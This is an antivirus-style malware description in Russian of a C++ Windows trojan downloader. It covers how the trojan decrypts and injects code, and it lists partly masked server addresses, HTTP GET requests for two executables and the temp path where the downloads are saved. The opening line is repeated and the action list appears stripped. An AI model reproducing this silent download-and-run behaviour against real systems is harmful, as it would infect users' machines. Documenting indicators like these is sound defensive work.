Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является приложением Windows (PE-EXE файл).
Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является приложением Windows (PE-EXE файл). Имеет размер 20992 байта. Написана на C++.
После запуска троянец читает из своего оригинального файла, расшифровывает и внедряет в адресное пространство своего процесса исполняемый код размером 16384 байта (детектируется Антивирусом Касперского как "Trojan-Downloader.Win32.Agent.cngp"). Внедренный код выполняет следующие действия:
188.***.161
194.***.3
GET /varag_sdfgkwlkgadfshn.exe HTTP/1.0
Host: 188.***.161
GET /bat.exe HTTP/1.0
Host: 188.***.161
GET /varag_sdfgkwlkgadfshn.exe HTTP/1.0
Host: 194.***.3
GET /bat.exe HTTP/1.0
Host: 194.***.3
%WinDir%\Temp\_ex-<rnd>.exeгде <rnd> – случайные двухзначные десятичные числа. На момент создания описания файлы не загружались.